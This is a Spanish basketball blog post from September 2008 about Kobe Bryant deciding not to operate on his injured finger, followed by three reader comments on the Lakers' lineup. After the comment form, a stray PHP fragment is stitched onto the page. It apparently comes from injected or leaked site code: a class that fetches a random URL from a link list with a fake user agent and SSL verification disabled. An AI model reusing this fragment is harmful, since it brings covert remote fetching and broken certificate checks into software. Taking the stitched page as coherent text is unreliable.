El dedo de Kobe… ¿el talón de Aquiles?

10 de September de 2008 por MagicJohnson32

meñique kobeContra todo pronóstico, Kobe Bryant no se operará de la lesión que arrastra en el dedo meñique de la mano derecha desde el pasado 5 de febrero,  precisamente en el debut de Pau Gasol como laker, contra los Nets. Dado el momento tan crítico en el que se produjo la lesión, Bryant prefirió no operarse y posponer el asunto hasta después de los Juegos Olímpicos. El escolta de los Lakers jugó los últimos 4 meses y medio de la temporada NBA, más toda la competición olímpica, con el vendaje que Gary Vitti le aplicó, y su rendimiento no pareció resentirse: Los Lakers, sin Bynum pero con Gasol, fueron líderes del Oeste al término de la regular season, superaron sin excesivos problemas a Nuggets, Jazz y Spurs, y únicamente cayeron ante la mayor experiencia y dureza mental de los Celtics. En lo individual, Kobe fue capaz de mantener e incluso de elevar su nivel de juego -sus estadísticas antes y después de la lesión son prácticamente idénticas- y de alzarse con su primer galardón como Jugador Más Valioso de la temporada. En Pequín, además, pudimos ver de nuevo a un Bryant decisivo, liderando al equipo USA en defensa y desequilibrando en ataque cuando más se le necesitó.

Por todo ello, y por la perspectiva de perderse el grueso del training camp y tal vez el inicio de la temporada, Bryant anunció ayer a través de su página oficial en Internet que ha tomado la decisión de no pasar por el quirófano: “Siempre he sentido que puedo mantener la concentración y jugar a un nivel alto incluso con diferentes lesiones, eso es realmente parte del juego. Cuando los médicos me dijeron que la recuperación podría ser de 12 semanas, decidí que no era el momento de operarse. La cuestión es que no quiero perder el tiempo para los Lakers, dado todo lo que estamos intentando lograr como equipo. Estoy  realmente ansioso por estar ahí con los chicos cuando el campus abra en unas pocas semanas.  Es un proceso que realmente nos une y si puedo evitar estar de baja, lo haré.”

kobe tiro libreEs obvio que la decisión de Bryant comporta un debate. ¿Resistirá el dedo? ¿No sería más adecuado operarse ahora, a riesgo de perderse el training camp e incluso algunos partidos de regular season, y olvidarse de esta lesión? ¿No supone un riesgo innecesario de una lesión más seria en un momento más inoportuno? Indiscutiblemente, las palabras del jugador tienen sentido. Los Lakers necesitan un training camp en condiciones, con todas sus piezas, de cara a ganar la solidez que exige la búsqueda del Anillo. Gasol llegó en febrero y se subió con el tren en marcha. Su adaptación, ya lo vimos, fue excelente, pero esta temporada compartirá juego interior con Andrew Bynum, con quien todavía no ha jugado un solo minuto. Esto, además, obligará a Pau a regresar a la posición de PF. Este nuevo escenario no sólo requerirá adaptación por parte de los jugadores implicados, sino por parte de todo el equipo, incluyendo al cuerpo técnico. ¿Cuál será el planteamiento de Phil Jackson? ¿Saldrá con Odom, Gasol y Bynum en el front-court, o pondrá de inicio a alguno de los aleros (Ariza, Walton o Radmanovic)? El Oeste no da tregua y a los Lakers les convendría iniciar la temporada regular con las ideas bastante claras en cuanto a todo lo dicho.

En definitiva, que la decisión de Bryant supone un riesgo no lo duda nadie. Y es probable que sea directamente un error. Pero él, y sólo él, sabe si está en condiciones de asumir dicho riesgo. De momento, quien más tiene que perder, es decir, los Lakers, ya han señalado a través de su portavoz que la franquicia “respeta y apoya la decisión”. Esperemos que ni Bryant ni los Lakers tengan que arrepentirse y que el dedo de Kobe no se convierta en su talón de Aquiles.

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Yo creo que ya llevamos un cierto tiempo todos conviviendo con esta lesión como para orientarnos un poco de lo que hay.
    En todo este tiempo ha sido un no parar para Kobe y aparentemente no se ha resentido excepto por un casi inapreciable cambio en la dinamica de tiro no confirmado (que podría ser imaginaciones nuestras) pero sí que ha repercutido ligeramente en su efectividad en el triple.
    La cuestión ya desde el principio, eran precísamente las molestias porque se trata de una lesión “menor” y en principio nadie pronosticaba una peora significativa (que seguro se hubiera dado con toda la tralla que ha sufrido el dedo todo este tiempo)
    También se hablaba de las defensas que iba a sufrir Kobe en playoffs, de Bruce dándole bocados en el dedo… :S
    Al final nada de nada ha pasado. Seguramente Kobe habrá sufrido las molestias que se esperaban pero las ha aguantado estupendamente y los riesgos asociados seguro que están más que ponderados por él y por los médicos del equipo.
    Yo no me preocuparía demasiado por ese tema en concreto… más allá de lo razonable, claro. Si lo han decidido así, bien está, si lo hubieran decidido de otra manera estoy seguro que también. Evidentemente lo ideal sería que no tuviera ninguna lesión encima.

    Sobre el tema de la configuración del equipo. Yo apuesto por un Odom desde el banquillo.
    Lo digo porque observo carencias en el juego interior si no considero a Odom como tal… y tampoco es que lo vea como un exterior especialmente determinante. Para mí la posición ideal de Odom es la de falso 4 y estoy seguro que por ahí hará un trabajo cojonudo combinándose con Pau y Bynum. De hecho, lo veo como el pegamento que mejor puede unir a ambos, porque me preocupa algo cómo pueden acoplarse ambos, teniendo en cuenta lo poco que hemos visto a Pau de 4 en los últimos tiempos.
    En mi cabeza, Ariza lo puede hacer muy bien como 3 específico… sin problemas físicos, puede dar mucho de lo que faltaba al equipo. Recursos puros de 3 tanto ofensivos como defensivos (algo de lo que Odom carece en algunos puntos) Le falta tiro exterior… pero trabajando ese aspecto y con los espacios que se supone puede disfrutar creo que puede hacer buen papel no desentonará siendo titular.
    Sin contar a Odom tenemos otras alternativas en la posición de alero que, al menos, el cuerpo técnico parece considerar como válidos. Walton y Radmanovic deben de aportar más… no olvidemos que llegamos a la final con estos dos sólo y, sinceramente, no lo van a poder hacer peor…
    Por eso, sin saber muy bien cómo está Mihm y si se cuenta o no con Mbenga, veo mucho más provable y más útil para el equipo (incluso para él) el rol de 6º hombre para Odom… y de paso liberas de alta carga de responsabilidad a Powell, al cual no veo demasiado preparado para ello.

    Por otro lado, el problema de Gasol es su resistencia física. Prioritario protegerlo. Según esa premisa no me extrañaría que, de no contar con Mihm operativo, Gasol pase a ser suplente de Bynum (lo digo más por físico que porque Bynum me pueda parecer mejor, que conste) y, por lo tanto 6º hombre. Tampoco me parece mala idea del todo…

      Citar

  2. MagicJohnson32 dice:
    #2

    Bueno, después de la lesión Kobe ya se estrujó el dedo un par de veces (creo recordar que una vez fue contra Toronto) y no pasó nada. Vamos, que le dolió, evidentemente, pero ya está.

    Supongo que sabe lo que se hace.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Yo me operaría y me quitaría, de paso, el tatuaje tan salchichero del brazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>